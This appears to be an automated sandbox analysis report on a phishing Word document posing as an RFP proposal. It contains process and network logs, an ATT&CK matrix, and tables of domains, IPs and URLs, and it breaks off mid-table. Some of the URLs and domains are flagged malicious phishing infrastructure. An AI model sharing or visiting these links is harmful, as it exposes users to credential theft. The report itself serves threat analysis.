Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.245.163.56:443 -> 192.168.2.18:49816 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.147.9:443 -> 192.168.2.18:49855 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.16.158.170:443 -> 192.168.2.18:49861 version: TLS 1.2
Source: classification engineClassification label: mal52.phis.winDOCX@21/245@55/261
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\Office
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{395C5E17-FB14-4D41-B877-1FE2C1B58B91} - OProcSessId.dat
Source: 2024 Tepa LLC RFP Proposal.docxOLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.ini
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\2024 Tepa LLC RFP Proposal.docx" /o ""
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGN
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1964,i,2873093495231121643,14732922469924082370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGN
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=1964,i,2873093495231121643,14732922469924082370,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3CE74DE4-53D3-4D74-8B83-431B3828BA53}\InProcServer32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: 2024 Tepa LLC RFP Proposal.docxInitial sample: OLE indicators vbamacros = False
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: Chrome Cache Entry: 363Jump to dropped file
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformation
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
Browser Extensions
1
Process Injection
11
Masquerading
OS Credential Dumping1
Process Discovery
Remote ServicesData from Local System2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS Memory1
File and Directory Discovery
Remote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Extra Window Memory Injection
1
Extra Window Memory Injection
Security Account Manager1
System Information Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
2024 Tepa LLC RFP Proposal.docx0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
jsdelivr.map.fastly.net
151.101.1.229
truefalse
    high
    nw2iycgst5mfz3kmc6onhudkkvl7u1mxoob5ixnhoc7c0jiwqzqza.lpliwptf.ru
    172.67.158.68
    truefalse
      unknown
      MRS-efz.ms-acdc.office.com
      52.98.200.210
      truefalse
        unknown
        h2-stratus.zohocdn.com
        103.103.196.108
        truefalse
          high
          wla3.ensfulthal.com
          172.67.199.137
          truetrue
            unknown
            files.zohopublic.eu
            185.230.214.169
            truefalse
              unknown
              ooc-g2.tm-4.office.com
              40.99.70.210
              truefalse
                high
                code.jquery.com
                151.101.2.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.25.14
                  truefalse
                    high
                    d28140lin2gosl.cloudfront.net
                    108.158.75.129
                    truefalse
                      high
                      challenges.cloudflare.com
                      104.18.95.41
                      truefalse
                        high
                        www.google.com
                        142.250.181.36
                        truefalse
                          high
                          l7-26-c2.zoho.eu
                          185.230.214.19
                          truefalse
                            unknown
                            sign.zoho.eu
                            unknown
                            unknownfalse
                              high
                              cdn.jsdelivr.net
                              unknown
                              unknownfalse
                                high
                                outlook.live.com
                                unknown
                                unknownfalse
                                  high
                                  assets.onestore.ms
                                  unknown
                                  unknownfalse
                                    high
                                    ajax.aspnetcdn.com
                                    unknown
                                    unknownfalse
                                      high
                                      files-accl.zohopublic.eu
                                      unknown
                                      unknownfalse
                                        unknown
                                        c.s-microsoft.com
                                        unknown
                                        unknownfalse
                                          high
                                          www.outlook.com
                                          unknown
                                          unknownfalse
                                            high
                                            webfonts.zohowebstatic.com
                                            unknown
                                            unknownfalse
                                              high
                                              static.zohocdn.com
                                              unknown
                                              unknownfalse
                                                high
                                                NameMaliciousAntivirus DetectionReputation
                                                https://sign.zoho.eu/zsguest?locale=en&sign_id=234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5&action_type=SIGNfalse
                                                  unknown
                                                  https://sign.zoho.eu/zsstateless#/review/234b4d535f495623c82c0acd40a2483896b98e445b3ddad6a95cabf1314181acac4187112810258f39cc82870d7380196d33456327214dbd96d2bbb818c66679ccaf377a559ed091bf2bba02a0961ba9b5bc7000127a8ac5?request_id=74446000000035009&action_id=74446000000035034&same_user=false&zs_user=false&zs_user_in_multiple_portals=false&user_loggedin=false&ishost=false&locale=en&is_invoked_from_mail=true&is_doc_corrected=false&is_zoho_user=falsetrue
                                                    unknown
                                                    https://wla3.ensfulthal.com/mw2hN4k/true
                                                      unknown
                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs
                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      172.217.19.206
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      152.199.19.160
                                                      unknownUnited States
                                                      15133EDGECASTUSfalse
                                                      103.103.196.108
                                                      h2-stratus.zohocdn.comIndia
                                                      56201ZOHO-INZohoCorporationPvtLtdINfalse
                                                      151.101.193.229
                                                      unknownUnited States
                                                      54113FASTLYUSfalse
                                                      2.20.68.72
                                                      unknownEuropean Union
                                                      37457Telkom-InternetZAfalse
                                                      104.110.240.208
                                                      unknownUnited States
                                                      16625AKAMAI-ASUSfalse
                                                      104.18.94.41
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      185.230.214.19
                                                      l7-26-c2.zoho.euNetherlands
                                                      41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHfalse
                                                      2.20.41.218
                                                      unknownEuropean Union
                                                      16625AKAMAI-ASUSfalse
                                                      52.111.252.18
                                                      unknownUnited States
                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      23.218.208.109
                                                      unknownUnited States
                                                      6453AS6453USfalse
                                                      104.121.5.198
                                                      unknownUnited States
                                                      16625AKAMAI-ASUSfalse
                                                      20.50.80.210
                                                      unknownUnited States
                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      185.230.214.169
                                                      files.zohopublic.euNetherlands
                                                      41913COMPUTERLINEComputerlineSchlierbachSwitzerlandCHfalse
                                                      151.101.194.137
                                                      unknownUnited States
                                                      54113FASTLYUSfalse
                                                      23.32.238.64
                                                      unknownUnited States
                                                      2828XO-AS15USfalse
                                                      104.21.73.56
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      2.19.198.209
                                                      unknownEuropean Union
                                                      16625AKAMAI-ASUSfalse
                                                      52.113.194.132
                                                      unknownUnited States
                                                      8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      151.101.1.229
                                                      jsdelivr.map.fastly.netUnited States
                                                      54113FASTLYUSfalse
                                                      104.17.24.14
                                                      unknownUnited States
                                                      13335CLOUDFLARENETUSfalse
                                                      23.218.209.163
                                                      unknownUnited States
                                                      6453AS6453USfalse
                                                      1.1.1.1
                                                      unknownAustralia
                                                      13335CLOUDFLARENETUSfalse
                                                      40.99.70.210
                                                      ooc-g2.tm-4.office.comUnited States
                                                      8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                      2.19.198.210
                                                      unknownEuropean Union
                                                      16625AKAMAI-ASUSfalse
                                                      172.217.17.35
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      142.250.181.142
                                                      unknownUnited States
                                                      15169GOOGLEUSfalse
                                                      172.67.158.68
